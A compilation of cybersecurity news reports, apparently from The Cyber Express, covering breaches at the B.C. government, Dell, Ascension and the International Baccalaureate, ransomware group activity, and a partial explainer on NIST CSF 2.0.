Since its inception, Treacle has achieved significant milestones. The firm secured grants such as the C3iHub Grant and the SISFS Grant, in 2021 and 2022, respectively. Additionally, Treacle represented India under DPIIT and participated in a sponsored delegation trip to Dubai in 2022. They also won a significant grant from the Department of Telecommunications, Government of India in DCIS 2023, and were named the Best Student Led Startup in the AWS Campus Fund Grand Challenge 2023. Treacle's journey began in June 2021, following the selection of its pioneering product idea for investment. The innovative approach towards developing a Deception Technology solution caught the attention of C3iHub, leading to the securement of early funding. The seeming dedication and hard work behind the team also resulted in securing the prestigious SISFS grant from the Government of India. Since July 2021, Treacle has been part of the esteemed IHub Programme, incubated at SIIC, IIT Kanpur, which has further strengthened their commitment to developing cybersecurity solutions that stand the test of time. The pre-seed funding round, which marks a significant milestone for the startup, is expected to propel Treacle's growth trajectory. The company's founders are confident that this influx of capital will enable them to accelerate their innovation pipeline, build a stronger team, and ultimately drive greater value for their customers. The startup's vision is to empower organizations with advanced cybersecurity solutions that provide real-time protection against emerging threats. With this vision in mind, Treacle is poised to make a significant impact in the cybersecurity landscape, and this latest funding round is a testament to the company's potential for growth and success. "Securing this funding allows us to accelerate our roadmap and bring our next-generation cybersecurity solutions to a wider audience," said Subhasis Mukhopadhyay, CEO of Treacle. "We are grateful for the support from our investors and are eager to continue our journey in making the digital world safer for everyone." Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

A state or state-sponsored actor orchestrated the "sophisticated" cyberattacks against the British Columbia government networks, revealed the head of B.C.’s public service on Friday. Shannon Salter, deputy minister to the premier, disclosed to the press that the threat actor made three separate attempts over the past month to breach government systems and that the government was aware of the breach, at the time, before finally making it public on May 8. Premier David Eby first announced that multiple cybersecurity incidents were observed on government networks on Wednesday, adding that the Canadian Centre for Cyber Security (CCCS) and other agencies were involved in the investigation. Salter in her Friday technical briefing refrained from confirming if the hack was related to last month’s security breach of Microsoft’s systems, which was attributed to Russian state-backed hackers and resulted in the disclosure of email correspondence between U.S. government agencies. However, she reiterated Eby's comments that there's no evidence suggesting sensitive personal information was compromised.

British Columbia Cyberattacks' Timeline

The B.C. government first detected a potential cyberattack on April 10. Government security experts initiated an investigation and confirmed the cyberattack on April 11. The incident was then reported to the Canadian Centre for Cyber Security, a federal agency, which engaged Microsoft’s Diagnostics and Recovery Toolset (DaRT) due to the sophistication of the attack, according to Salter. Premier David Eby was briefed about the cyberattack on April 17. On April 29, government cybersecurity experts discovered evidence of another hacking attempt by the same “threat actor,” Salter said. The same day, provincial employees were instructed to immediately change their passwords to 14 characters long. B.C.’s Office of the Chief Information Officer (OCIO) described it as part of the government's routine security updates. Considering the ongoing nature of the investigation, the OCIO did not confirm if the password reset was actually linked to the British Columbia  government cyberattack but said, "Our office has been in contact with government about these incidents, and that they have committed to keeping us informed as more information and analysis becomes available."

Another cyberattack was identified on May 6, with Salter saying the same threat actor was responsible for all three incidents.

The cyberattacks were not disclosed to the public until Wednesday late evening when people were busy watching an ice hockey game, prompting accusations from B.C. United MLAs that the government was attempting to conceal the attack.

“How much sensitive personal information was compromised, and why did the premier wait eight days to issue a discreet statement during a Canucks game to disclose this very serious breach to British Columbians?”the Opposition MLA Todd Stone asked. Salter clarified that the cybersecurity centre advised against public disclosure to prevent other hackers from exploiting vulnerabilities in government networks. She revealed three separate cybersecurity incidents, all involving efforts by the hackers to conceal their activities. Following a briefing of the B.C. NDP cabinet on May 8, the cyber centre concurred that the public could be notified. Salter said that over 40 terabytes of data was being analyzed but she did not specify if the hackers targeted specific areas of government records such as health data, auto insurance or social services. The province stores the personal data of millions of British Columbians, including social insurance numbers, addresses and phone numbers. Public Safety Minister and Solicitor General Mike Farnworth told reporters Friday that no ransom demands were received, making the motivation behind the multiple cyberattacks unclear.

Farnworth said that the CCCS believes a state-sponsored actor is behind the attack based on the sophistication of the attempted breaches.

"Being able to do what we are seeing, and covering up their tracks, is the hallmarks of a state actor or a state-sponsored actor." - Farnworth

Government sources told CTV News that various government ministries and agencies, and their respective websites, networks and servers, face approximately 1.5 billion “unauthorized access” or hacking attempts daily. The number has increased over the last few years and the reason why the province budgets millions of dollars per year to cybersecurity. Salter confirmed the government spends more than $25 million a year to fortify its defenses and added that previous investments in B.C.'s cybersecurity infrastructure helped detect the multiple attacks last month. Microsoft last month alerted several U.S. federal agencies that Russia-backed hackers might have pilfered emails sent by the company to those agencies, including sensitive information like usernames and passwords. However, Salter did not confirm if Russian-backed hackers are associated with the B.C. security breach. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Recently, a wave of malware attacks has surfaced, exploiting vulnerabilities in the update mechanism of the eScan antivirus software. This eScan antivirus backdoor exploit distributes backdoors and cryptocurrency miners, such as XMRig, posing a significant threat to large corporate networks. In this blog, we’ll look into the details of this eScan antivirus backdoor exploit and […]

The post Backdoors and Miners Amid eScan Antivirus Backdoor Exploit appeared first on TuxCare.

The post Backdoors and Miners Amid eScan Antivirus Backdoor Exploit appeared first on Security Boulevard.

British Columbia in Canada has faced multiple "sophisticated cybersecurity incidents" on government networks, province premier said this week. Premier David Eby emphasized that there is presently no evidence of compromised sensitive information and that investigations are ongoing, with further efforts required to ascertain potential data access, as per his Wednesday statement. While the attack's specific nature remains unclear, labeling it as "sophisticated" and its involvement with government networks suggests fans theories of espionage from a state-sponsored actor seeking political intelligence. “I know the public will have many questions about these incidents, and we will be as transparent as we can without compromising the investigation. As this complex work proceeds, government will provide British Columbians with updates and information as we are able.” Eby said. The provincial government's investigation involves the Canadian Centre for Cyber Security and other agencies, with the Office of the Information and Privacy Commissioner duly informed. Neither of the agencies immediately responded to The Cyber Express’ request for a comment.

Opposition’s Spar in the House

B.C.'s political adversaries engaged in heated debate during the question period on Thursday morning, a day after the province disclosed the multiple cybersecurity incidents within its networks. British Columbia United MLA Todd Stone criticized the government, alleging it "concealed a massive cyberattack on the provincial government for eight days." Stone’s accusations came on the backdrop of a memo from The Office of the Chief Information Officer that directed all provincial employees to immediately change passwords. British Columbians are rightly concerned about their sensitive information, questioning whether it has been compromised by a foreign, state-sponsored cyberattack. So, I ask the premier today: Will he reveal who was responsible for this attack?" Stone demanded. Stone pointed out the timing of Eby's Wednesday statement, suggesting it was issued discreetly "while everyone was preoccupied with last night’s Canucks game." [caption id="attachment_67963" align="aligncenter" width="256"] BC United MLA Todd Stone arguing in the House during the QP on Thursday morning. (Credit: Legislative Assembly of B.C.)[/caption]

“How much sensitive personal information was compromised, and why did the premier wait eight days to issue a discreet statement during a Canucks game to disclose this very serious breach to British Columbians?” the Opposition MLA asked.

In response to BC United's criticisms, Public Safety Minister Mike Farnworth accused Stone of "playing politics." “We take our advice from the Canadian Cyber Security Service, who deal with these kinds of things on an ongoing basis. That’s who we will take the advice from in terms of protecting public information, every single time. We will never take advise from the opposition — all they ever want to do is play politics,” Farnworth retorted amid uproar in the House. [caption id="attachment_67981" align="aligncenter" width="271"] Public Safety Minister Mike Farnworth addressing opposition queries. (Credit: Legislative Assembly of B.C.)[/caption]

“When an incident like this happens, the first thing that happens is the protection of the system, honourable speaker. The protection of the information that’s done by technical experts, honourable speaker, who work on the advice of the Canadian Cyber Security System,” Farnworth explained.

“And, honourable speaker, the reason they do that is because if you go out and give information before that’s done, you actually end up compromising people’s information, potentially.”

Multiple Cybersecurity Incidents Rock B.C. in Last Few Weeks

The latest revelation of cyberattacks on government networks comes on the heels of a string of cyberattacks that the westernmost province in Canada is facing. B.C. headquartered retail and pharmacy chain London Drugs announced April 28, closure of its stores across Western Canada after falling victim to a cybersecurity incident. The impact was such that they were forced to even take their phones offline and pharmacies could only satisfy “urgent” needs of patients on-site. Addressing reporters later Thursday afternoon, Farnworth clarified that there was no evidence linking the multiple cybersecurity incidents targeting the province networks to the event that led to the closure of London Drugs locations in the west for several days. "At present, we lack any information suggesting a connection. Once an incident is detected, technical security teams work swiftly to secure the system and ensure its integrity, while closely coordinating with the Canadian Cyber Security Service to address the situation," he explained. "While a comprehensive investigation involving multiple agencies is ongoing, we currently have no indication of any link to the London Drugs incident." The same day as the London Drugs cyberattack came to light, another western province entity BC Libraries reported a cybersecurity incident where a hacker attempted to extort payment for data exfiltrated from its newly commissioned server and threatening to release that data publicly if no payment was received.

China’s Involved?

This development follows an official inquiry in Canada, revealing unsuccessful Chinese attempts to interfere in past elections. Beijing has refuted these allegations. The Canadian Security Intelligence Service (CSIS) recently published an annual report, warning of ongoing Chinese interference in Canadian political affairs, risking democratic integrity.

“Canada’s strong democratic institutions, advanced economy, innovative research sectors, and leading academic institutions make Canada an attractive target for cyber-enabled espionage, sabotage, and foreign influenced activities, all of which pose significant threats to Canada’s national security,” the report said.

The report identified China as a state-based threat conducting widespread cyber espionage across various sectors, including government, academia, private industry, and civil society organizations.

A recent Cégep de Lanaudière cyberattack has paralyzed the education system, causing classes to grind to a halt and prompting exam cancellations, affecting around 7,000 students. The assailant, targeting the college network's servers, rendered Omnivox inaccessible – the primary digital platform for both faculty and student communication. Students logging into Omnivox were met with a disconcerting sight: a flood of images, some of them highly inappropriate. The affected CEGEPs – Lanaudière, L'Assomption, Joliette, and Formation Continue - remain suspended as cybersecurity experts mitigate the cyberattack on Cégep de Lanaudière.

Decoding the Cégep de Lanaudière Cyberattack 

In a Sunday communication to students and staff, college management emphasized the need for external cybersecurity expertise to investigate the attack's origins and, if feasible, patch the breach. "The investigation is ongoing. Data compromise is not a current concern," said Marilyn Sansregret, spokesperson for Cégep régional de Lanaudière, reported CBC.  However, hopes for a swift resolution were dashed when students were informed on Tuesday evening that the class hiatus would extend until at least Friday. Sansregret affirmed that the IT department is working tirelessly to reinforce the college's digital defenses, but it is too early to anticipate a return to normalcy. The Cyber Express has sought a response from Cégep de Lanaudière regarding the cyber attack. However, at the time of writing this, no official statement or response has been shared, leaving the identity of the threat actor unknown.

Cyberattacks on Education Institutions and Universities

Meanwhile, Academica Group weighed in on the crisis, highlighting the profound impact of the cyberattack. Cégep de Lanaudière temporarily closed its campuses in Joliette, L’Assomption, Terrebonne, and Repentigny as it grappled with the aftermath of the intrusion. While the full extent of the Cégep de Lanaudière cyberattack is unknown, a music school on the Joliette campus reported disruptions to essential services like lighting, heating, ventilation, and fire alarms. In a broader context, the surge in cyber assaults against educational institutions highlights the acute vulnerability of academic infrastructure to digital threats. Verizon's 2024 Data Breach Investigations Report reveals a staggering increase in attacks targeting the educational services sector. With ransomware emerging as a preeminent external threat and internal vulnerabilities compounding the security measures in education institutions, the need for preemptive cybersecurity measures cannot be overstated. This is an ongoing story and The Cyber Express will be closely monitoring the situation. We’ll update this post once we have more information on the Cégep de Lanaudière cyberattack or any further information from the organization.  Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

In an unexpected turn of events, LockBitSupp, the administrator of the notorious LockBit ransomware group, responded publicly to the Federal Bureau of Investigation (FBI) and international law enforcement's efforts to identify and apprehend him. After bringing back previously seized domains, law enforcement identified Dmitry Yuryevich Khoroshev as the mastermind behind the LockBit operations in an earlier public announcement. This was followed by official sanctions issued by the U.S., U.K., and Australia, accompanied by 26 criminal charges ranging from extortion to hacking, collectively carrying a potential maximum sentence of 185 years imprisonment. The Justice Department has also offered a staggering $10 million reward for information leading to Khoroshev's capture. However, LockBitSupp denied the allegations and attempted to turn the situation into a peculiar contest on the group's remaining leak site.

LockBitSupp Opens Contest to Seek Contact with Individual

The Lockbit admin made a post within the group's leak site about a new contest (contest.omg) in order to encourage individuals to attempt to contact Dmitry Yuryevich Khoroshev. The announcement asserts that the FBI is wrong in its assessment and that the named individual is not LockBitSupp. The announcement seems to try and attribute the alleged identification mistake as a result of an unfortunate cryptocurrency mixing with the ransomware admin's own cryptocurrency funds, which they claim must have attracted the attention of the FBI. Cryptocurrency mixing is activity done to blend different streams of potentially identifiable cryptocurrency to provide further anonymity of transactions. The contest, brazenly invites participants to reach out to the individual believed to be Dmitry Yuryevich Khoroshev and report back on his wellbeing for $1000. The ransomware admin then claimed that the first person to provide evidence such as videos, photos, or screenshots confirming contact with the the "poor guy," as LockBitSupp refers to him, would receive the reward. [caption id="attachment_67621" align="alignnone" width="1055"] Source: X.com (@RedHatPentester)[/caption] Participants were instructed to send their findings through the encrypted messaging platform Tox, using a specific Tox ID provided by LockBitSupp.

LockBitSupp Shares Details of Named Individual

In addition to the contest details, LockBitSupp shared multiple links to LockBit-associated file-sharing services on the dark web, presumably for individuals to archive gathered details and submit as contest entries. They also listed extensive personal details alleged to belong to Dmitry Khoroshev, including email addresses, a Bitcoin wallet address,  passport and tax identification numbers Amid the defiance and contest announcement, LockBitSupp expressed concern for the well-being of the person they claim has been mistakenly identified as them, urging Dmitry Yuryevich Khoroshev, if alive and aware of the announcement, to make contact. This unusual move by LockBitSupp attempts to challenge the statement made by law enforcement agencies and underscores the complex dynamics of the cyber underworld, where hackers taunt their pursuers openly. LockBitSupp emphasized that the contest will remain relevant as long as the announcement is visible on the blog. The admin hinted that there may be similar contests in the future with more substantial rewards, urging followers to stay tuned for updates. The announcement was uploaded and last updated on May 9, 2024, UTC, leaving the public and the cybersecurity community watching closely for further developments. In a recent indictment Khoroshev was identified to behind LockBit's operations and functioned as the group's administrator since September 2019. Khoroshev and the LockBit group was stated to have extorted at least $500 million from victims in 120 countries across the world. Khoroshev was stated to have received around $100m from his part in this activity. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Dell has issued a warning to its customers regarding a data breach following claims by a threat actor of pilfering information for roughly 49 million customers. In an email sent to customers, the computer manufacturer disclosed that a Dell portal containing customer data associated with purchases had been compromised. "We are presently investigating an incident involving a Dell portal, housing a database containing limited types of customer information linked to Dell purchases," stated a Dell data breach notification. Dell clarified that the accessed information encompassed:

• Names
• Physical addresses
• Dell hardware and order details, comprising service tags, item descriptions, order dates, and relevant warranty information

The company said the stolen data did not encompass financial or payment data, email addresses or phone numbers. Dell assured customers that they are collaborating with law enforcement and a third-party forensics firm to probe the matter. [caption id="attachment_67595" align="aligncenter" width="687"] Dell data breach notification[/caption] Dell Technologies is a publicly traded company that operates in 180 countries and is headquartered in Round Rock, Texas. Dell is the third-largest personal computer vendor in the world by unit sales, behind Lenovo and HP and serves more than 10 million small and medium-sized businesses and receives 500 million annual eCommerce visits. The tech giant generated a revenue of $102.3 billion in 2023 and has over 500,000 commercial customers and 2,500 enterprise accounts.

Dell Data Breach Set Appeared on Dark Web

Despite Dell's reassurances, the breach data was purportedly put up for sale on an underground hacker forum by a threat actor named “Menelik” on April 28. The threat actor claimed this data set contained an up-to-date details of registered Dell servers including vital personal and company information such as full names, addresses, cities, provinces, postal codes, countries, unique 7-digit service tags of systems, system shipment dates (warranty start), warranty plans, serial numbers (for monitors), Dell customer numbers and Dell order numbers. The threat actor asserted that he was the sole possessor of this data that entailed approximately 7 million records of individual/personal purchases, while 11 million belong to consumer segment companies. The remaining data pertained to enterprise, partners, schools or unidentified entities. The threat actor also highlighted the top five countries with the most systems represented in the database, which included the United States, China, India, Australia and Canada. The data, claimed to be sourced from Dell and containing 49 million customers and other systems details between 2017 and 2024, aligned with the details outlined in Dell's breach notification. However, The Cyber Express could not confirm if the two data sets are the same as Dell did not immediately respond to our request for confirmation. Although the sale of the database appears to have ceased, the possibility of further exploitation remains. Although Dell refrained from disclosing the specific impact of the breach, it remains vigilant about potential risks associated with the stolen information. While the compromised data lacks email addresses, threat actors could exploit it for targeted phishing and smishing attacks against Dell customers. They could contact Dell customers as fake customer service executives and lead them into downloading malware or infostealers as is seen in many previous campaigns. Dell advises customers to exercise caution regarding any communications purportedly from Dell, especially those urging software installations, password changes or other risky actions and encourages customers to verify the legitimacy of such communications directly with Dell. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Lenovo takes a bold step towards fortifying cybersecurity by joining the Secure by Design pledge, initiated by the US Cybersecurity and Infrastructure Security Agency (CISA). This collaborative endeavor, announced on May 8th, unites industry giants in a concerted effort to raise security standards across diverse tech sectors. With a comprehensive approach encompassing multi-factor authentication, vulnerability reduction, and robust supply chain security, Lenovo stands at the forefront of this initiative, highlighting the initiative of Secure by Design.

Lenovo Joins CISA’s Secure by Design Pledge

The Secure by Design pledge targets key facets of enterprise technology, including software products and services, on-premises solutions, cloud services, and SaaS features. Participating companies, including Lenovo, pledge to make tangible strides across seven core focus areas.  These encompass critical aspects such as multi-factor authentication (MFA), default password protocols, vulnerability reduction, security patching, vulnerability disclosure policies, common vulnerabilities and exposures (CVE), and intrusion evidence. Doug Fisher, Lenovo's Chief Security Officer, expressed profound support for the pledge, emphasizing the critical of industry-wide collaboration in fortifying cybersecurity frameworks.  "We commend CISA’s initiative to drive an industry-wide ‘secure by design’ pledge and welcome the opportunity to align our own well-established security by design approach with other industry best practices," stated Fisher. "It’s good for the industry that global technology leaders are able to share best practices, driving meaningful progress and accountability in security." Lenovo's commitment to the Secure by Design pledge dovetails seamlessly with its existing security protocols. The company boasts a robust security infrastructure encompassing best-in-class practices across product development, supply chain management, and privacy initiatives. These include the implementation of the Security Development Lifecycle, a vigilant Product Security Incident Response Team (PSIRT), and stringent global supply chain security measures. "Our pledge transcends geographies and benefits all our global customers who face the same industry-wide security challenges US CISA seeks to address, including continued alignment with emerging security regulations around the world," remarked Fisher, underlining Lenovo's global outlook towards cybersecurity enhancement.

Global Cybersecurity Initiative

Lenovo's proactive stance positions it as a pioneer among the initial group of 68 companies committing to the Secure by Design pledge. These companies, range from tech titans like Amazon Web Services, Cisco, Google, IBM, Microsoft, Palo Alto Networks, and Trend Micro to cybersecurity specialists such as Claroty, CrowdStrike, Cybeats, Finite State, Forescout, Fortinet, Rapid7, SentinelOne, Sophos, Tenable, Trend Micro, and Zscaler, have all endorsed the Secure by Design pledge.  The Secure by Design pledge highlights a voluntary commitment to advancing security measures within enterprise software realms, aligning with CISA’s overarching principles. While physical products like IoT devices and consumer goods fall outside the pledge's scope, participating companies pledge to diligently pursue the outlined goals over the ensuing year. Furthermore, the pledge encourages radical transparency, urging manufacturers to publicly document their progress and challenges encountered. This fosters a culture of accountability and knowledge sharing within the cybersecurity domain. In acknowledging the diversity of approaches, the pledge empowers software manufacturers to devise bespoke strategies tailored to their product portfolios. Companies exceeding the outlined goals are encouraged to share their methodologies, fostering an environment of continuous improvement and innovation. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

The International Baccalaureate Organization (IBO) confirmed a hacking incident, while clarifying that no ongoing exam papers were leaked despite claims online of a wider cheating scandal. The IB found students sharing exam details online before the completion of their ongoing tests globally, and simultaneously observed increased malicious activity targeting its computer networks. On investigating the online claims, IB found that the leaked data set appeared to be limited to earlier data from 2018, while the ongoing exam paper leaks could be a result of some students sharing exam papers online rather than a hack. Founded in 1968, the International Baccalaureate is a non-profit educational organization based in Geneva, Switzerland. It aims to provide high quality international education free of regional, political or educational agendas.

Exam Cheating Concerns Amidst International Baccalaureate Hack

Earlier last week, the International Baccalaureate had released an update stating that it was investigating online speculation about potential cheating by some students in the ongoing exams. The organization stated that while there was no evidence of widespread cheating, some students might have engaged in "time zone cheating". The organization defined time zone cheating as an action where students "who have completed their examinations share what they can recall from memory about the exam questions on social media before other students take the examination." Citing its own academic integrity policy which forbids such behaviour, the organization stated that students engaging in such activity would not receive their Diploma certificates or grades and may potentially be banned from future exam retests. [caption id="attachment_67556" align="alignnone" width="2800"] Source: Official Update[/caption] After its initial investigations, the organization stated that it had experienced an increase in attempted malicious activity aiming to interfere with its systems. It also confirmed that some data from 2018, including employee names, positions, and emails, had been breached through a third-party vendor, and screenshots of this leaked data were shared online. However, the organization again clarified that at the time of the investigation, no recent exam material was found to be compromised. The notice further stated that IB was continuing to assess the incident and had taken steps to contain the incident. The organization mentioned that it would provide further information on the incident as the situation evolved. The Cyber Express team has reached out to the International Baccalaureate for further details, and a spokesman responded with a link to the second update notification.

Students Petition For Exam Cancellation

The exam is taken by nearly 180,000 students internationally. However, recent speculations over the hacking incident and cheating allegations have raised concerns among students and their parents, leading to an online petition demanding exam cancellation or re-test. Amidst the speculation, the International Baccalaureate took action to remove leaked content and stated that cheaters would face severe consequences. Some condemned the leaks as failures in governance and urged for improved exam security, prompting the IB to affirm its intention to stay ahead of technological threats while promoting academic integrity in the exam process. The IB further cautioned its authorized network of schools about data breaches and phishing attempts. The leaked materials from the International Baccalaureate data breach were observed to have been downloaded over 45,000 times. The leaked content, allegedly included mathematics and physics papers which were widely circulated online, further raising doubts about exam integrity. It remains to be seen, if the student petition demand's for justice or the organization's observation of increased hacking attempts will lead to a further escalation of the situation. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Ascension, one of the largest nonprofit healthcare systems in the United States, is facing disruptions in clinical operations due to a cyberattack that prompted the organization to take some of its systems offline. The organization detected unusual activity on select technology network systems on Wednesday, prompting immediate response, investigation initiation and activation of remediation efforts. Consequently, access to certain systems has been interrupted during the ongoing investigation process. The healthcare organization has advised its business partners to temporarily sever connections to its systems as a precautionary measure and said it would notify partners when it is safe to reconnect. The cyber incident has disrupted clinical operations, prompting an investigation into the extent and duration of the disruption. Ascension has notified relevant authorities about the cyberattack and enlisted the services of Mandiant incident response experts to aid in the investigation and remediation efforts. The organization operates in 19 states and the District of Columbia, Ascension oversees 140 hospitals and 40 senior care facilities. It also boasts of a significant workforce comprising of 8,500 providers, 35,000 affiliated providers and 134,000 associates. In 2023, Ascension’s total revenue amounted to $28.3 billion.

Patients Say Chaos on Display at Ascension Healthcare

Talking about the disruptions at the healthcare facility, Ascension said, “Our care teams are trained for these kinds of disruptions and have initiated procedures to ensure patient care delivery continues to be safe and as minimally impacted as possible.” But the ground reality seems to be different, as per a patient account. Talking to local news media Fox 2, a patient named Zackery Lopez said “chaos” was on display this Wednesday in Ascension Providence Southfield hospital where he had to wait nearly seven hours to get a pain medication for his cancer resurgence.

“Right now it is crazy. Nurses are running around. Doctors are running around. There’s no computers whatsoever they can use," Lopez said. "So, they’re actually using charts.”

Lisa Watson, a nurse at Ascension Via Christi St. Joseph in Wichita, Kansas, told another local news outlet that the hospital shut down its operating rooms on Wednesday following the cybersecurity issue. She also said that system’s, which the hospital uses to scan medications of patients was down, along with their electronic charts.

“We are paper-charting all medications, and all lab orders are being hand-written and sent by pneumatic tube systems to the unit they’re supposed to go to,” said Watson.

"No one knew where they (forms) were or which ones to use for hours. We need to have the forms ready to go to switch to paper charting. I left still not knowing how to place lab orders, talked with dozens of people from lab to phlebotomy to management, no one knew. No one was prepared and patients suffered."

“We have endless incessant modules about stupid policies to save hospitals money but never about downtime protocol,” she added.

Lopez is also concerned that his personal information was possibly at risk but said he has not received a convincing answer from the authorities yet. "They really didn’t tell me if it was protected or not," he said. "They really kind of just brushed it off when I asked them. They say they’re trying to get everything back on, back on track." **Update on May 10, 1 AM ET** The company in a Thursday update said that it did not have a definite timeline to restore systems that were pulled offline as a result of the cybersecurity incident.

“Systems that are currently unavailable include our electronic health records system, MyChart (which enables patients to view their medical records and communicate with their providers), some phone systems, and various systems utilized to order certain tests, procedures and medications.”

It added that patient care was being provided with established downtime protocols and procedures, in which Ascension's workforce is well trained. “It is expected that we will be utilizing downtime procedures for some time. Patients should bring to their appointment notes on their symptoms and a list of current medications and prescription numbers or the prescription bottles so their care team can call in medication needs to pharmacies,” the update said. As a precautionary measure, some non-emergent elective procedures, tests and appointments have been temporarily paused and patients appointments or procedures will need to be rescheduled.

“Due to downtime procedures, several hospitals are currently on diversion for emergency medical services in order to ensure emergency cases are triaged immediately.”

Healthcare Breaches on the Rise

This incident adds to a growing list of healthcare breaches and ransomware attacks, including the Change Healthcare that caused widespread disruptions across U.S. Initially described as an “enterprise-wide connectivity issue,” the severity of the attack went a bar above when Blackcat – also known as Alphv ransomware gang claimed responsibility for it. The Russia-based ransomware and extortion gang claimed to have stolen millions of Americans’ sensitive health and patient information, a tactic commonly employed by ransomware gangs to exert pressure on victims. However, on February 29, Blackcat withdrew its claim on the breached data of the healthcare group, raising questions if a ransom was paid. The company did confirm that is paid a $22 million ransom later but it now faces multiple lawsuits for alleged negligence in safeguarding clients’ personal information. The parent company UnitedHealth has allocated over $2 billion to fight the fallout of the Change Healthcare data breach. The company last week also stated that a lack of multi-factor authentication (MFA) resulted into the massive hack. In a related development, the U.S. Department of Health and Human Services (HHS) recently cautioned about threat actors employing social engineering tactics to target IT help desks in the Healthcare and Public Health (HPH) sector. These attackers employ deception to enroll new multi-factor authentication (MFA) devices under their control, thereby gaining access to corporate resources, the HHS warned.  Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

The Medusa ransomware group has demanded $3.5 million from the Chemring Group on their leak site, along with a looming threat to leak 186.78 GB of sensitive documents claimed to have been obtained from the Chemring Group data breach. The group set the negotiation deadline as May 16, 2024, providing the victim about 9 days to surrender to demands while also presenting additional options such as prolonging negotiation period, removing or downloading the data allegedly stolen during the attack at varying prices. The Chemring Group is a multi-national UK-based business that provides a range of technology solutions and services to the aerospace, defence and security markets around the world. The Chemring Group data breach post was shared on the threat actor's data leak site along with 3 American organizations listed as victims. However, the authenticity of these claims is yet to be verified. While the Chemring Group refutes any major compromise, they have confirmed an ongoing investigation into the alleged data breach.

Medusa Hackers Demand $3.5 Million Following Chemring Group Data Breach

On the leak site, the ransomware group demanded a ransom of 3.5 million USD with a negotiation deadline of 16th May 2024. The group allegedly exfiltrated 186.78 GB of confidential documents, databases, and SolidWorks design files. However no sample data had been shared making it harder to verify the group's claims. Additionally, the leak site provided the victim with the options to add an additional day to make ransom negotiations for 1 million, to delete all the data for 3.5 million or download/delete the exfiltrated data for 3.5 million. [caption id="attachment_67453" align="alignnone" width="944"] Source: X.com / @H4ckManac[/caption] The Chemring Group PLC listing was also accompanied by the listing of three alleged victim organizations, including One Toyota of Oakland, Merritt Properties and Autobell Car Wash. After being reached out for additional details by The Cyber Express team, a Chemring Group spokesman made the following statements about the alleged ransomware attack:

Chemring has been made aware of a post that has appeared on X (formerly Twitter) alleging that the Group has been subject to a ransomware attack. An investigation has been launched, however there is currently nothing to indicate any compromise of the Group’s IT systems, nor have we received any communication from a threat actor suggesting that we have been breached. We confirm that all Chemring businesses are operating normally. Our preliminary investigations lead us to believe that this attack was on a business previously owned by Chemring but where there is no ongoing relationship or connection into our IT systems. As this is subject to an ongoing criminal investigation we cannot comment further at this stage.

Who is Medusa Ransomware Group?

The MedusaLocker ransomware group has known to have been active since September 2019. The group  usually gains initial access to victims’ networks by exploiting known vulnerabilities in Remote Desktop Protocol (RDP). The Medusa ransomware group has been observed to increase their attack campaigns after the debut of a their dedicated data leak site in February 2023. The group primarily targets healthcare, education and public-sector organizations inits campaigns. The group was previously responsible for an attack on Toyota in December 2023 in which the group obtained access to sensitive details such as names, addresses, contact information, lease-purchase details, and IBAN numbers. The incident prompted the company to adopt stronger data protection and notify affected customers while informing details about the breach to relevant authorities. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

The recent crackdown on the crypto mixer money laundering, Samourai, has unveiled a sophisticated operation allegedly involved in facilitating illegal transactions and laundering criminal proceeds. The cryptocurrency community was shocked by the sudden Samourai Wallet shutdown. The U.S Department of Justice (DoJ) revealed the arrest of two co-founders, shedding light on the intricacies of their […]

The post Crypto Mixer Money Laundering: Samourai Founders Arrested appeared first on TuxCare.

The post Crypto Mixer Money Laundering: Samourai Founders Arrested appeared first on Security Boulevard.

The NIST Cybersecurity Framework (CSF) is a framework designed to provide cybersecurity risk-management guidance to private and public industries, government agencies, and other organizations . It is intended to be applicable for use by any organization regardless of it's size or scale, age, or sector. The version 2.0 of the cybersecurity framework is much more extensive with its core guidance and lists additional subcategories as well as links to online resources that offer further guidance on practices to achieve these objectives. The guidance is divided into six areas of focus: identify, protect, detect, respond, recover, and govern. This article unravels the NIST Cybersecurity Framework, the major changes outlined in CSF 2.0, and some of the ways in which it can be adopted.

The NIST Cybersecurity Framework

Overview

The NIST Cybersecurity Framework (NIST CSF) was first introduced in 2014 by the National Institute of Standards and Technology to bolster the security of infrastructure within the United States. By establishing a common set of standards, goals, and terminology to reduce the risk and impact of cyberattacks. By promoting the shared framework, the NIST CSF aids in better decision-making and encourages security standards to address threats such as phishing and ransomware. The initial version was updated to Version 1.1 in 2018, adopting major changes such the inclusion of the Identify core function, additional sub-categories and improved clarity. The draft copy for version 2.0 of the framework was released with the intention of receiving public feedback in August 2023 and closed for comments in November 2023, the final release of Version 2.0 was released in February 2024. Since the new framework demonstrates increased flexibility to various situations, the NIST has recommended its voluntary self-adoption by organizations of all sizes.

Target Audience

The primary audience for the framework comprises of individuals responsible for developing and overseeing cybersecurity planning and strategization within organizations. It is also relevant for other roles involved in risk management, such as executives, board of directors, acquisition professionals, technology experts, risk managers, legal professionals, human resource specialists, and auditors who specialize in cybersecurity and risk management. Additionally, the CSF can serve as a useful asset to those involved with the making and influencing of private and public policy (e.g., associations, professional organizations, regulators) who establish and communicate priorities for cybersecurity risk management.

Major Changes in NIST Cybersecurity Framework 2.0

